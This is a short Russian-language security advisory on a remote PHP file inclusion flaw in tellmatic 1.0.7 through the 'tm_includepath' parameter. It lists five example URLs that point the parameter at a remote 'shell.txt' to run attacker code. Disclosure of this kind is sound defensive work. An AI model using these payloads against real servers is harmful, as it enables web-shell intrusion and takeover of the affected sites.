Хакер #305. Многошаговые SQL-инъекции
Программа: tellmatic 1.0.7
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «tm_includepath» множественными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Успешное эксплуатирование уязвимости требует включение опции "register_globals" в конфигурационном файле PHP.
Пример:
http://localhost/tellmatic/include/Classes.inc.php?tm_includepath=http://localhost/shell.txt?
http://localhost/tellmatic/include/statistic.inc.php?tm_includepath=http://localhost/shell.txt?
http://localhost/tellmatic/include/status.inc.php?tm_includepath=http://localhost/shell.txt?
http://localhost/tellmatic/include/status_top_x.inc.php?tm_includepath=http://localhost/shell.txt?
http://localhost/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://localhost/shell.txt?